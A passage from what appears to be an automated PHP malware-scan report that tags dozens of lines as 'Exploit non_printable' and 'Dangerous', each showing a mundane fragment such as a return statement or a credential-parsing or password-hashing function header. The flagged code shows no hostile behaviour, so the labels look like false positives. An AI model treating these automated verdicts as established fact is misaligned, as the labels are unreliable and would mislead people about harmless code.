<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">'::' </span><span style="color: #007700">. </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$norm</span><span style="color: #007700">), </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">8</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 388</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dir</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 390</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_site_statuses</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">site_statuses_migrate_from_legacy_state</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 400</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$data</span><span style="color: #007700">[</span><span style="color: #DD0000">'sites'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 402</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 404</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_site_statuses_map</span><span style="color: #007700">(</span><span style="color: #0000BB">$sites_map</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_get_post_action</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (string) </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'up_to_action'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 431</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_statuses_migrate_from_legacy_state</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$imported</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">merge_site_status</span><span style="color: #007700">(&</span><span style="color: #0000BB">$site</span><span style="color: #007700">, </span><span style="color: #0000BB">$statuses</span><span style="color: #007700">, </span><span style="color: #0000BB">$name_counts </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 453</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_status_label</span><span style="color: #007700">(</span><span style="color: #0000BB">$status</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (string) </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'action'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return isset(</span><span style="color: #0000BB">$labels</span><span style="color: #007700">[</span><span style="color: #0000BB">$status</span><span style="color: #007700">]) ? </span><span style="color: #0000BB">$labels</span><span style="color: #007700">[</span><span style="color: #0000BB">$status</span><span style="color: #007700">] : </span><span style="color: #0000BB">$labels</span><span style="color: #007700">[</span><span style="color: #DD0000">'pending'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_db_info_rows</span><span style="color: #007700">(</span><span style="color: #0000BB">$site</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 494</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$rows</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">apr1_md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$password</span><span style="color: #007700">, </span><span style="color: #0000BB">$salt </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_safe_header</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 520</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'$apr1$' </span><span style="color: #007700">. </span><span style="color: #0000BB">$salt </span><span style="color: #007700">. </span><span style="color: #DD0000">'$' </span><span style="color: #007700">. </span><span style="color: #0000BB">$tmp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 522</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">apr1_to64</span><span style="color: #007700">(</span><span style="color: #0000BB">$v</span><span style="color: #007700">, </span><span style="color: #0000BB">$n</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_flush_json</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 588</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$a</span><span style="color: #007700">, </span><span style="color: #0000BB">$b</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'is_dir'</span><span style="color: #007700">] ? -</span><span style="color: #0000BB">1 </span><span style="color: #007700">: </span><span style="color: #0000BB">1</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return -</span><span style="color: #0000BB">1</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">1</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 592</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strcasecmp</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">], </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'up_to_wp_register_admin_page'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_get_app_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_nonce_url</span><span style="color: #007700">(</span><span style="color: #0000BB">admin_url</span><span style="color: #007700">(</span><span style="color: #DD0000">'admin-ajax.php?action=up_to_scanner'</span><span style="color: #007700">), </span><span style="color: #DD0000">'up_to_scanner_app'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_register_admin_page</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_render_admin_page</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 81</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_handle_app_request</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_esc_ident</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 846</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'`' </span><span style="color: #007700">. </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'`'</span><span style="color: #007700">, </span><span style="color: #DD0000">'``'</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">) . </span><span style="color: #DD0000">'`'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 848</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_sanitize_file_part</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 852</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">!== </span><span style="color: #DD0000">'' </span><span style="color: #007700">? </span><span style="color: #0000BB">$value </span><span style="color: #007700">: </span><span style="color: #DD0000">'site'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 854</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_empty</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 864</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_db_host_port</span><span style="color: #007700">(</span><span style="color: #0000BB">$host</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 867</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'127.0.0.1'</span><span style="color: #007700">, </span><span style="color: #0000BB">null</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 869</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">], </span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 871</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #0000BB">$host</span><span style="color: #007700">, </span><span style="color: #0000BB">null</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 873</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">merge_db_credentials</span><span style="color: #007700">(</span><span style="color: #0000BB">$base</span><span style="color: #007700">, </span><span style="color: #0000BB">$overlay</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 879</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$base</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 881</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_is_complete</span><span style="color: #007700">(</span><span style="color: #0000BB">$creds</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 882</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$creds</span><span style="color: #007700">[</span><span style="color: #DD0000">'db_name'</span><span style="color: #007700">]) !== </span><span style="color: #DD0000">'' </span><span style="color: #007700">&& </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$creds</span><span style="color: #007700">[</span><span style="color: #DD0000">'db_user'</span><span style="color: #007700">]) !== </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 884</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_from_wp</span><span style="color: #007700">(</span><span style="color: #0000BB">$wp</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 895</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$c</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 897</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_from_env</span><span style="color: #007700">(</span><span style="color: #0000BB">$env</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 923</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_from_joomla</span><span style="color: #007700">(</span><span style="color: #0000BB">$joo</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 935</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_db_credentials_from_parts</span><span style="color: #007700">(</span><span style="color: #0000BB">$env_vars</span><span style="color: #007700">, </span><span style="color: #0000BB">$wp_vars</span><span style="color: #007700">, </span><span style="color: #0000BB">$joo_vars</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 940</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">db_credentials_is_complete</span><span style="color: #007700">(</span><span style="color: #0000BB">$creds</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$creds </span><span style="color: #007700">: </span><span style="color: #0000BB">null</span><span style="color: #007700">;</span>
</span>
